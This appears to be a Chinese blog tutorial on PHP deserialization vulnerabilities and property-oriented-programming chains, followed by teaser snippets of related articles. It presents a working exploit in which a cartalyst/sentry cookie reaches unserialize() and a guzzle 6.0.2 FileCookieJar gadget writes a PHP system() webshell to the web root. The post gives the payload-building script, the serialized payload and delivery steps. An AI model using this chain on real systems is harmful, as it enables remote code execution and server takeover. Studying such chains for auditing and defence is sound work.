代码编织梦想

一、序列化和反序列化

序列化和反序列化的目的是使得程序间传输对象会更加方便。序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串转换为对象供程序使用。在PHP中序列化和反序列化对应的函数分别为serialize()和unserialize()。反序列化本身并不危险,但是如果反序列化时,传入反序列化函数的参数可以被用户控制那将会是一件非常危险的事情。不安全的进行反序列化造成的危害只有你想不到,没有他做不到,是的,没错。

序列化和反序列化的原理已经有很多文章了,这里就不赘述了。PHP的类有很多的 '魔术方法' ,比如:

__construct(), __destruct()
__call(), __callStatic()
__get(), __set()
__isset(), __unset()
__sleep(), __wakeup()
__toString()
__invoke()
__set_state()
__clone()
__debugInfo()

这么多的魔术方法中我们所需要关注的方法也就是__destruct() 和 __wakeup() 方法.这两个方法中前者是在对象被销毁时程序会自动调用,后者是在类对象被反序列化时被调用.所以这两个方法是在 对象反序列化一直到程序执行完毕这整个过程中,必定会被调用的方法,如果在这两个函数中有一些危险的动作,并且能够被我们所利用,那么漏洞并出现了。

二、反序列漏洞的利用思路

理论  

在反序列化中,我们所能控制的数据就是对象中的各个属性值,所以在PHP的反序列化有一种漏洞利用方法叫做 "面向属性编程" ,即 POP( Property Oriented Programming)。和二进制漏洞中常用的ROP技术类似。在ROP中我们往往需要一段初始化gadgets来开始我们的整个利用过程,然后继续调用其他gadgets。在PHP反序列化漏洞利用技术POP中,对应的初始化gadgets就是__wakeup() 或者是__destruct() 方法, 在最理想的情况下能够实现漏洞利用的点就在这两个函数中,但往往我们需要从这个函数开始,逐步的跟进在这个函数中调用到的所有函数,直至找到可以利用的点为止。下面列举些在跟进其函数调用过程中需要关注一些很有价值的函数。

如果在跟进程序过程中发现这些函数就要打起精神,一旦这些函数的参数我们能够控制,就有可能出现高危漏洞.

Demo

所使用的代码。

DemoPopChain.php

<?php
    class DemoPopChain{
    private $data = “barn”;
    private $filename = ‘/tmp/foo’;
    public function __wakeup(){
        $this->save($this->filename);
    }
        public function save($filename){
        file_put_contents($filename, $this->data);
    }
?>

 unserialize.php

<?php
        require(‘./DemoPopChain.php’);
        unserialize(file_get_contents(‘./serialized.txt));
?>

这是一个很简单的具有反序列漏洞的代码,程序从serialized.txt文件中读取需要进行反序列化的字符串。这个我们可控。同时该文件还定义了一个 DemoPopChain 类,并且该类实现了 __wakeup 函数,然后在该函数中,又调用了save函数,其参数为 类对象的filename属性值,然后在 save函数中调用了 file_put_contents 函数,该函数的两个参数分别为从save函数中传下来的 filename属性值 和 该对象的data属性值。又由于在反序列化的过程中被反序列化的对象的属性值是我们可控的,于是我们就通过对函数的嵌套调用和对象属性值的使用得到了一个 任意文件写入任意内容的漏洞.这就是所谓的POP。就是关注整个函数的调用过程中参数的传递情况,找到可利用的点,这和一般的Web漏洞没什么区别,只是可控制的值有直接传递给程序的参数转变为了 对象中的属性值。

三、现实中查找反序列化漏洞及构造exploit的方法

前置知识

PHP的 unserialize() 函数只能反序列化在当前程序上下文中已经被定义过的类.在传统的PHP中你需要通过使用一大串的include() 或者 require()来包含所需的类定义文件。于是后来出现了 autoloading 技术,他可以自动导入需要使用的类,再也不需要程序员不断地复制粘贴 那些include代码了。这种技术同时也方便了我们的漏洞利用.因为在我们找到一个反序列化点的时候我们所能使用的类就多了,那么实现漏洞利用的可能性也就更加高。

还有一个东西要提一下,那就是Composer,这是一个php的包管理工具,同时他还能自动导入所以依赖库中定义的类。这样一来 unserialize() 函数也就能使用所有依赖库中的类了,攻击面又增大不少。

1.Composer配置的依赖库存储在vendor目录下

2.如果要使用Composer的自动类加载机制,只需要在php文件的开头加上 require __DIR__ . '/vendor/autoload.php';

漏洞发现技巧

默认情况下 Composer 会从 Packagist下载包,那么我们可以通过审计这些包来找到可利用的 POP链。

找PHP链的基本思路.

1.在各大流行的包中搜索 __wakeup() 和 __destruct() 函数.

2.追踪调用过程

3.手工构造 并验证 POP 链

4.开发一个应用使用该库和自动加载机制,来测试exploit.

构造exploit的思路

1.寻找可能存在漏洞的应用

2.在他所使用的库中寻找 POP gadgets

3.在虚拟机中安装这些库,将找到的POP链对象序列化,在反序列化测试payload

4.将序列化之后的payload发送到有漏洞web应用中进行测试.

Example

1. 寻找可能存在漏洞的应用:  cartalyst/sentry

漏洞代码: /src/Cartalyst/Sentry/Cookies/NativeCookie.php

     ...
  public function getCookie()
  {
     ...
     return unserialize($_COOKIE[$this->getKey()]);
     ...
  }
}

这里从 cookie中获取了值,然后直接将他序列化.

2.程序使用的库中的POP Gadgets: guzzlehttp/guzzle

找Gadgets的最好的一个地方就是composer.json文件,他写明了程序需要使用的库.

  {
    "require": {
    "cartalyst/sentry": "2.1.5",
    "illuminate/database": "4.0.*",
    "guzzlehttp/guzzle": "6.0.2",
    "swiftmailer/swiftmailer": "5.4.1"
  }
}

a.从git repo下载这些库

b.在其中搜索__wakeup() 和 __destruct() 函数

/guzzle/src/Cookie/FileCookieJar.php

namespace GuzzleHttpCookie;
class FileCookieJar extends CookieJar
  ...
  public function __destruct()
  {
    $this->save($this->filename);
  }
  ...

这里使用类对象的filename属性值作为参数传入了save函数.我们来看看save函数具体实现.

FileCookieJar->save()

public function save($filename)
{
$json = [];
foreach ($this as $cookie) {
  /** @var SetCookie $cookie */
  if ($cookie->getExpires() && !$cookie->getDiscard()) {
    $json[] = $cookie->toArray();
  }
 }
if (false === file_put_contents($filename, json_encode($json))) {
    throw new RuntimeException("Unable to save file {$filename}");
  }
}

可以看到我们传入的参数最后是直接被作为要写入内容的文件的文件名.这下文件名可控了,如果我们再能够控制文件的内容就能实现getshell了.通过代码可以发现文件的内容为上面一层循环中来得到的数组经过json编码后得到的.而数组中的内容为 $cookie->toArray() ,那么我们得去找到 $cookie对象是在哪定义的来确定他返回的值是什么,以及是否可利用.还有一点,我们还需要过掉那个判断才能给 json 数组赋值.所以我们需要关注的有三个点.

$cookie->getExpires()
!$cookie->getDiscard()
$json[] = $cookie->toArray()

我们并不知道$cookie 具体是什么类,我们可以通过搜索函数名,来定位这个类.通过这样定位到了SetCookie类.其代码如下.

namespace GuzzleHttpCookie;
class SetCookie
    ...
    public function toArray(){
       return $this->data;
    }
    ...
    public function getExpires(){
        return $this->data['Expires'];
    }
    ...
    public function getDiscard(){
        return $this->data['Discard'];
    }

可以看到那三个方法只是简单的返回了data数组的特定键值.

3.搭建环境进行poc测试

首先在虚拟机里创建这样一个composer.json文件来安装提供POP gadgets的库.

{
    "require": {
        "guzzlehttp/guzzle": "6.0.2"
    }
}

之后使用这个文件安装库

然后使用这个库,来构造反序列化的payload

<?php
    require __DIR__ . '/vendor/autoload.php';
    use GuzzleHttpCookieFileCookieJar;
    use GuzzleHttpCookieSetCookie;
    $obj = new FileCookieJar('/var/www/html/shell.php');
    $payload = '<?php echo system($_POST['poc']); ?>';
    $obj->setCookie(new SetCookie([
        'Name' => 'foo', 'Value'
        'Domain' => $payload,
        => 'bar',
        'Expires' => time()]));
    file_put_contents('./built_payload_poc', serialize($obj));

 运行这个文件得到payload

# php build_payload.php
# cat built_payload_poc
O:31:"GuzzleHttpCookieFileCookieJar":3:{s:41:"GuzzleHttpCookieFileCookieJarfilename";s:23:"/var/www/html/shell.php";s:36:"GuzzleHttpCookieCookieJarcookies";a:1:{i:1;O:27:"GuzzleHttpCookieSetCookie":1:{s:33:"GuzzleHttpCookieSetCookiedata";a:9:{s:4:"Name";s:3:"foo";s:5:"Value";s:3:"bar";s:6:"Domain";s:36:"<?php echo system($_POST['poc']);?>";s:4:"Path";s:1:"/";s:7:"Max-Age";N;s:7:"Expires";i:1450225029;s:6:"Secure";b:0;s:7:"Discard";b:0;s:8:"HttpOnly";b:0;}}}s:39:"GuzzleHttpCookieCookieJarstrictMode";N;}

现在payload已经生成,我们在创建一个文件来测试这个payload的结果.

<?php
    require __DIR__ . '/vendor/autoload.php';
    unserialize(file_get_contents("./built_payload_poc"));

这个文件的内容很简单,就是把我们刚刚生成的payload反序列化.来看看效果

成功写入一个shell.

4.寻找使用了这个漏洞库并且有反序列化操作的程序这里是cartalyst/sentry,然后拿POC去打就好.

演示:

首先网站目录没有shell.php文件

 让我们将cartalyst_sentry的cookie值设为经过url编码的反序列化payload,然后发送到应用中去.

 

 现在shell.php已经出现了

 

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43080961/article/details/122275601

php反序列化漏洞与webshell_vspiders的博客-爱代码爱编程

前言 最近和小伙伴们一起研究了下PHP反序列化漏洞,突发奇想,利用反序列化漏洞写一个一句话木马效果应该蛮不错的。于是便有此文。 0x01 PHP反序列化 说起PHP反序列化,那必须先简单说一下PHP的序列化。PHP序列化是将一个对象、数组、字符串等转化为字节流便于传输,比如跨脚本等。而PHP反序列化是将序列化之后的字节流还原成对象、字符、数组等。但是P

PHP反序列化漏洞——漏洞原理及防御措施-爱代码爱编程

序列化   将对象转换成字符串 反序列化 将特定格式的字符串转换成对象什么是反序列化漏洞 PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程

【渗透测试】简单了解PHP反序列化漏洞-爱代码爱编程

目录 0x001 基础概念0x002 PHP魔术方法 0x001 基础概念 PHP 反序列化漏洞又叫做 PHP 对象注入漏洞。 实验效果演示 下图所示为利用PHP反序列化漏洞达到命令执行的效果 序列化 PHP 的所谓的序列化也是一个将各种类型的数据,压缩并按照一定格式存储的过程,他所使用的函数是serialize(),如下代码就是将一

php 反序列化漏洞,PHP反序列化漏洞详解-爱代码爱编程

最近和小伙伴们一起研究了下PHP反序列化漏洞,突发奇想,利用反序列化漏洞写一个一句话木马效果应该蛮不错的。本文主要和大家分享PHP反序列化漏洞详解,希望能帮助到大家。 0x01 PHP反序 说起PHP反序列化,那必须先简单说一下PHP的序列化。PHP序列化是将一个对象、数组、字符串等转化为字节流便于传输,比如跨脚本等。而PHP反序列化是将序列化之后

php新手漏洞挖掘,php漏洞挖掘思路-爱代码爱编程

最近研究PHP 漏洞的挖掘,总结了一些我挖到的漏洞,整理了一下思路,求各路神人补充、批评、指导~ 本文所有示例均来自我在乌云上已由厂商允许公开的漏洞 由于是实例的分析,基础知识请百度,就不全都粘贴到前面了 0x01: 搜索所有的用户可控变量(GET/POST/COOKIE/referer ) 原因:所有用户输入都是有害的,代码审计注重函数和变量

php 序列化漏洞,PHP反序列化漏洞成因及漏洞挖掘技巧与案例 | ADog's Blog-爱代码爱编程

最近在深入研究php的反序列化,觉得Test404这篇可能是同类当中写的最好的,不过不知道这篇出处是不是360的。。在这里转载一下以便新人学习~ 翻译:hac425 一、序列化和反序列化 序列化和反序列化的目的是使得程序间传输对象会更加方便。序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串转换

详解PHP反序列化漏洞-爱代码爱编程

详解PHP反序列化漏洞 序列化与反序列化定义常见使用情况常见的序列化格式反序列化中常见的魔术方法反序列化绕过protected和private绕过__wakeup绕过(CVE-2016-7124)引用利用16进制绕过字符过滤同名方法的利用绕过部分正则字符逃逸字符增多字符减少对象注入session反序列化漏洞session定义PHP session工

PHP反序列化漏洞原理浅谈-爱代码爱编程

序列化与反序列化 序列化就是指将数据结构或者对象状态转换成可取用的格式,以便在相同或者不同的计算机中进行数据的传输。 个人理解 就是将一个对象用一串字符表示出来用来进行通信和传输,一个类,里面包含很多方法和变量,不能直接以类这种格式进行传输,不然会传输很多的字符而且也不好识别。所以将类转换成一种固定的格式传输再进行逆向的转换这就是序列化与反序列化。

PHP反序列化漏洞-爱代码爱编程

序列化于反序列化?         在对一个变量赋值后,若重新打开一个shell,或当本次程序运行完成后,变量值就会从内存中清除掉,序列化的目的就是把变量保存在硬盘中,当要再次使用的时候通过发序列化将之间序列化后的内容变回可用变量。         PHP序列化函数                 serialize()函数用于序列化对象或